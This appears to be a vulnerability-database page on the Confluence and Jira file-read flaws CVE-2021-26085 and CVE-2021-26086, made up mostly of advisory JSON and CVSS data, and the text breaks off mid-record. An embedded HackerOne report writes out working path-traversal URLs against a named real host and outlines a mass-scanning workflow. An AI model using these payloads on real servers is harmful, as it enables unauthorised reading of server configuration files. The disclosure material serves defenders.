Description
Affected versions of Atlassian Confluence Server allow remote, unauthenticated attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint.
The affected versions are all versions before 7.4.10, and versions from 7.5.0 up to but not including 7.12.3.
This vulnerability was discovered by Amit Laish, GE Digital, Cyber Security Lab.
*Affected versions:*
* version < 7.4.10
* 7.5.0 ≤ version < 7.12.3
*Fixed versions:*
* 7.4.10
* 7.12.3
* 7.13.0
* 7.14.0
Affected Software
Related
{"id": "CONFSERVER-67893", "vendorId": null, "type": "atlassian", "bulletinFamily": "software", "title": "Pre-Authorization Arbitrary File Read in /s/ endpoint - CVE-2021-26085", "description": "Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint.\r\n\r\nThe affected versions are before version 7.4.10, and from version 7.5.0 before 7.12.3.\r\n\r\nThis vulnerability was discovered by\u00a0Amit Laish, GE Digital, Cyber Security Lab.\r\n\r\n\u00a0\r\n\r\n*Affected versions:*\r\n * version < 7.4.10\r\n * 7.5.0 \u2264 version < 7.12.3\r\n\r\n*Fixed versions:*\r\n * 7.4.10\r\n * 7.12.3\r\n * 7.13.0\r\n * 7.14.0 \u00a0", "published": "2021-07-21T00:18:45", "modified": "2021-11-29T21:28:34", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, "href": "https://jira.atlassian.com/browse/CONFSERVER-67893", "reporter": "security-metrics-bot", "references": [], "cvelist": ["CVE-2020-29448", "CVE-2021-26085", "CVE-2021-26086"], "immutableFields": 
[], "lastseen": "2022-01-05T06:44:34", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-60469", "ATLASSIAN:CONFSERVER-67893", "ATLASSIAN:CWD-5685", "ATLASSIAN:JRASERVER-72695", "CONFSERVER-60469", "CWD-5685", "JRASERVER-72695"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-1063"]}, {"type": "cve", "idList": ["CVE-2020-29448", "CVE-2021-26085", "CVE-2021-26086"]}, {"type": "dsquare", "idList": ["E-737"]}, {"type": "exploitdb", "idList": ["EDB-ID:50377", "EDB-ID:50380"]}, {"type": "githubexploit", "idList": ["7568F9C3-3A35-590E-90A2-866D5C8D59B2", "9413B7EF-463D-5026-9383-8878A2BD51D2", "B3FA9C79-AA38-5ADB-8E71-898783D49FB4"]}, {"type": "hackerone", "idList": ["H1:1369288"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/ATLASSIAN-CONFLUENCE-CVE-2020-29448/"]}, {"type": "nessus", "idList": ["CONFLUENCE_CONFSERVER-60469.NASL", "CONFLUENCE_CVE-2021-26085.NBIN", "WEB_APPLICATION_SCANNING_112860", "WEB_APPLICATION_SCANNING_112861", "WEB_APPLICATION_SCANNING_112862", "WEB_APPLICATION_SCANNING_112954", "WEB_APPLICATION_SCANNING_112955", "WEB_APPLICATION_SCANNING_112956", "WEB_APPLICATION_SCANNING_112965", "WEB_APPLICATION_SCANNING_112966"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164401", "PACKETSTORM:164405"]}, {"type": "seebug", "idList": ["SSV:99336"]}, {"type": "zdt", "idList": ["1337DAY-ID-36851", "1337DAY-ID-36852"]}], "rev": 4}, "score": {"value": 6.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-60469", "ATLASSIAN:CONFSERVER-67893", "ATLASSIAN:CWD-5685", "ATLASSIAN:JRASERVER-72695"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-1063"]}, {"type": "cve", "idList": ["CVE-2020-29448", "CVE-2021-26085", "CVE-2021-26086"]}, {"type": "dsquare", "idList": ["E-737"]}, {"type": "exploitdb", "idList": ["EDB-ID:50377", "EDB-ID:50380"]}, {"type": "githubexploit", "idList": ["7568F9C3-3A35-590E-90A2-866D5C8D59B2", 
"9413B7EF-463D-5026-9383-8878A2BD51D2", "B3FA9C79-AA38-5ADB-8E71-898783D49FB4"]}, {"type": "hackerone", "idList": ["H1:1369288"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/ATLASSIAN-CONFLUENCE-CVE-2020-29448/"]}, {"type": "nessus", "idList": ["CONFLUENCE_CVE-2021-26085.NBIN", "WEB_APPLICATION_SCANNING_112860", "WEB_APPLICATION_SCANNING_112861", "WEB_APPLICATION_SCANNING_112862"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164401", "PACKETSTORM:164405"]}, {"type": "seebug", "idList": ["SSV:99336"]}, {"type": "zdt", "idList": ["1337DAY-ID-36851", "1337DAY-ID-36852"]}]}, "exploitation": null, "vulnersScore": 6.1}, "affectedSoftware": [{"version": "7.6.3", "operator": "le", "name": "confluence server and data center"}, {"version": "7.9.0", "operator": "le", "name": "confluence server and data center"}, {"version": "7.8.3", "operator": "le", "name": "confluence server and data center"}, {"version": "7.10.0", "operator": "le", "name": "confluence server and data center"}, {"version": "7.10.1", "operator": "le", "name": "confluence server and data center"}, {"version": "7.13.0", "operator": "lt", "name": "confluence server and data center"}, {"version": "7.4.10", "operator": "lt", "name": "confluence server and data center"}, {"version": "7.12.3", "operator": "lt", "name": "confluence server and data center"}], "_state": {"dependencies": 1647589307, "score": 0}}
{"atlassian": [{"lastseen": "2021-11-29T22:44:51", "description": "Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint.\r\n\r\nThe affected versions are before version 7.4.10, and from version 7.5.0 before 7.12.3.\r\n\r\nThis vulnerability was discovered by\u00a0Amit Laish, GE Digital, Cyber Security Lab.\r\n\r\n\u00a0\r\n\r\n*Affected versions:*\r\n * version < 7.4.10\r\n * 7.5.0 \u2264 version < 7.12.3\r\n\r\n*Fixed versions:*\r\n * 7.4.10\r\n * 7.12.3\r\n * 7.13.0\r\n * 7.14.0 \u00a0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-07-21T00:18:45", "type": "atlassian", "title": "Pre-Authorization Arbitrary File Read in /s/ endpoint - CVE-2021-26085", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26085", "CVE-2020-29448", "CVE-2021-26086"], "modified": "2021-11-29T21:28:34", "id": "ATLASSIAN:CONFSERVER-67893", "href": "https://jira.atlassian.com/browse/CONFSERVER-67893", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": 
"2022-01-05T06:45:01", "description": "The ConfluenceResourceDownloadRewriteRule class in Confluence Server and Confluence Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check.\r\n\r\nh3. Affected versions:\r\n * version < 6.13.18\r\n * 6.14.0 \u2264 version < 7.4.6\r\n * 7.5.0 \u2264 version < 7.8.3\r\n\r\n\r\nh4. Fixed versions:\r\n * 6.13.18\r\n * 7.4.6\r\n * 7.8.3\r\n * 7.9.0\r\n\r\nThis vulnerability is attributed to Amit Laish, a security researcher from GE Digital.\u00a0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2020-11-10T00:03:08", "type": "atlassian", "title": "Pre-Authorization Limited Arbitrary File Read in Confluence Server - CVE-2020-29448", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29448", "CVE-2020-36240", "CVE-2021-26085", "CVE-2021-26086"], "modified": "2021-10-11T12:29:47", "id": "CONFSERVER-60469", "href": "https://jira.atlassian.com/browse/CONFSERVER-60469", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-10-11T12:42:48", 
"description": "The ConfluenceResourceDownloadRewriteRule class in Confluence Server and Confluence Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check.\r\n\r\nh3. Affected versions:\r\n * version < 6.13.18\r\n * 6.14.0 \u2264 version < 7.4.6\r\n * 7.5.0 \u2264 version < 7.8.3\r\n\r\n\r\nh4. Fixed versions:\r\n * 6.13.18\r\n * 7.4.6\r\n * 7.8.3\r\n * 7.9.0\r\n\r\nThis vulnerability is attributed to Amit Laish, a security researcher from GE Digital.\u00a0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2020-11-10T00:03:08", "type": "atlassian", "title": "Pre-Authorization Limited Arbitrary File Read in Confluence Server - CVE-2020-29448", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-36240", "CVE-2021-26085", "CVE-2020-29448", "CVE-2021-26086"], "modified": "2021-10-11T12:29:47", "id": "ATLASSIAN:CONFSERVER-60469", "href": "https://jira.atlassian.com/browse/CONFSERVER-60469", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-11-15T12:43:59", "description": 
"Affected versions of Atlassian Jira Server and Data Center\u00a0allow remote attackers to read particular files via a path traversal vulnerability in the\u00a0/WEB-INF/web.xml endpoint.\r\n\r\n\u00a0\r\n\r\nThe affected versions are before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1.\r\n\r\n\u00a0\r\n\r\n*Affected versions:*\r\n * version < 8.5.14\r\n * 8.6.0 \u2264 version < 8.13.6\r\n * 8.14.0 \u2264 version < 8.16.1\r\n\r\n*Fixed versions:*\r\n * 8.5.14\r\n * 8.13.6\r\n * 8.16.1\r\n * 8.17.0 \u00a0\r\n\r\n\r\n\r\nh4. Mitigation\r\nUntil the upgrade you may use the following workaround to protect the files:\r\nhttps://confluence.atlassian.com/jirakb/workaround-for-cve-2019-15004-979416164.html", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-08-12T03:49:00", "type": "atlassian", "title": "Limited Remote File Read in Jira Software Server - CVE-2021-26086", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26085", "CVE-2020-29448", "CVE-2021-26086", "CVE-2019-15004"], "modified": "2021-11-15T12:13:43", "id": "ATLASSIAN:JRASERVER-72695", "href": 
"https://jira.atlassian.com/browse/JRASERVER-72695", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-27T12:29:46", "description": "Affected versions of Atlassian Jira Server and Data Center\u00a0allow remote attackers to read particular files via a path traversal vulnerability in the\u00a0/WEB-INF/web.xml endpoint.\r\n\r\n\u00a0\r\n\r\nThe affected versions are before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1.\r\n\r\n\u00a0\r\n\r\n*Affected versions:*\r\n * version < 8.5.14\r\n * 8.6.0 \u2264 version < 8.13.6\r\n * 8.14.0 \u2264 version < 8.16.1\r\n\r\n*Fixed versions:*\r\n * 8.5.14\r\n * 8.13.6\r\n * 8.16.1\r\n * 8.17.0 \u00a0\r\n\r\n\r\n\r\nh4. Mitigation\r\nUntil the upgrade you may use the following workaround to protect the files:\r\nhttps://confluence.atlassian.com/jirakb/workaround-for-cve-2019-15004-979416164.html", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-08-12T03:49:00", "type": "atlassian", "title": "Limited Remote File Read in Jira Software Server - CVE-2021-26086", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2019-14994", "CVE-2019-15004", "CVE-2020-29448", "CVE-2021-26085", "CVE-2021-26086"], "modified": "2022-01-27T09:57:48", "id": "JRASERVER-72695", "href": "https://jira.atlassian.com/browse/JRASERVER-72695", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-09-16T06:43:45", "description": "The ResourceDownloadRewriteRule class in Crowd before version 4.0.4, and from version 4.1.0 before 4.1.2 allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check.\r\n\r\nh3. Affected versions:\r\n * version < 4.0.4\r\n * 4.10.0 \u2264 version < 4.1.2\r\n\r\nh4. Fixed versions:\r\n * 4.0.4\r\n * 4.1.2\r\n\r\nThis vulnerability is attributed to Amit Laish, a security researcher from GE Digital.\u00a0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-02-16T18:29:42", "type": "atlassian", "title": "Pre-Authorization Limited Arbitrary File Read in Crowd - CVE-2020-36240", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-36240", "CVE-2020-29448"], "modified": "2021-09-16T05:28:35", 
"id": "ATLASSIAN:CWD-5685", "href": "https://jira.atlassian.com/browse/CWD-5685", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-05T06:39:26", "description": "The ResourceDownloadRewriteRule class in Crowd before version 4.0.4, and from version 4.1.0 before 4.1.2 allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check.\r\n\r\nh3. Affected versions:\r\n * version < 4.0.4\r\n * 4.10.0 \u2264 version < 4.1.2\r\n\r\nh4. Fixed versions:\r\n * 4.0.4\r\n * 4.1.2\r\n\r\nThis vulnerability is attributed to Amit Laish, a security researcher from GE Digital.\u00a0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-02-16T18:29:42", "type": "atlassian", "title": "Pre-Authorization Limited Arbitrary File Read in Crowd - CVE-2020-36240", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29448", "CVE-2020-36240"], "modified": "2021-09-16T05:28:35", "id": "CWD-5685", "href": "https://jira.atlassian.com/browse/CWD-5685", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], 
"hackerone": [{"lastseen": "2021-11-26T17:55:41", "bounty": 0.0, "description": "These vulnerabilities were found with https://trickest.com https://trickest.io\n\nCVE-2021-26085:\n=====================\n>https://jira.mariadb.org:/s/123cfx/_/;/WEB-INF/web.xml\n\nCVE-2021-26086:\n=====================\n>https://jira.mariadb.org/s/cfx/_/;/WEB-INF/web.xml\n\nVideo explanation:\n---------------------\n\n### Node EOF-RAW-DATA:\n- Found Jira hosts from various bug bounty programs convert to file\n\n### Node SED-ADD-AT-BEGINNING:\n- Append https:// to every line\n\n### Node PASTE-JIRA-PATHS\n- Converts Jira paths to file\n\n### Node MEG(tool)\n- Requesting URLs and paths from the file\n\n### Node IS-IT-JIRA?\n- Checking if the requested URL is Jira\n\n### Node TAKE-JIRA-URLs\n- Parsing previous nodes to get raw URLs\n\n### Node CVE-2021-26086\n- Converts payloads to a file\n\n### Node CVE-2021-26085\n- Converts payloads to a file\n\n### Node RECURSIVELY-CAT-ALL\n- Converts payloads file into one\n\n### Node MEG (2)\n- Requesting URLs and paths from the file\n\n### Node VALIDATE CVE-2021-26086\n- Validates CVEs by searching for \"<web-app </web-app>\" in meg responses\n\n## Impact\n\nCVE-2021-26086 allows remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint\nCVE-2021-26085 allows remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-10-13T12:36:15", "type": "hackerone", "title": "MariaDB: Path Traversal 
CVE-2021-26086 CVE-2021-26085", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26085", "CVE-2021-26086"], "modified": "2021-11-05T17:33:15", "id": "H1:1369288", "href": "https://hackerone.com/reports/1369288", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2022-03-23T17:23:18", "description": "The ConfluenceResourceDownloadRewriteRule class in Confluence Server and Confluence Data Center before version 6.13.18, from 6.14.0 before 7.4.6, and from 7.5.0 before 7.8.3 allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-02-22T21:15:00", "type": "cve", "title": "CVE-2020-29448", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", 
"baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29448"], "modified": "2021-02-26T20:26:00", "cpe": [], "id": "CVE-2020-29448", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-29448", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2022-03-30T15:23:20", "description": "Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. The affected versions are before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-08-16T01:15:00", "type": "cve", "title": "CVE-2021-26086", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26086"], "modified": "2022-03-30T13:13:00", "cpe": [], "id": "CVE-2021-26086", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26086", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2022-06-10T17:24:21", "description": "Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint. The affected versions are before version 7.4.10, and from version 7.5.0 before 7.12.3.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-08-03T00:15:00", "type": "cve", "title": "CVE-2021-26085", "cwe": ["CWE-862"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26085"], "modified": "2022-06-10T14:25:00", "cpe": [], "id": "CVE-2021-26085", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26085", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}], "nessus": [{"lastseen": "2022-01-12T12:05:53", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.18, 6.14.x < 7.4.6 or 7.5.x < 7.8.3. 
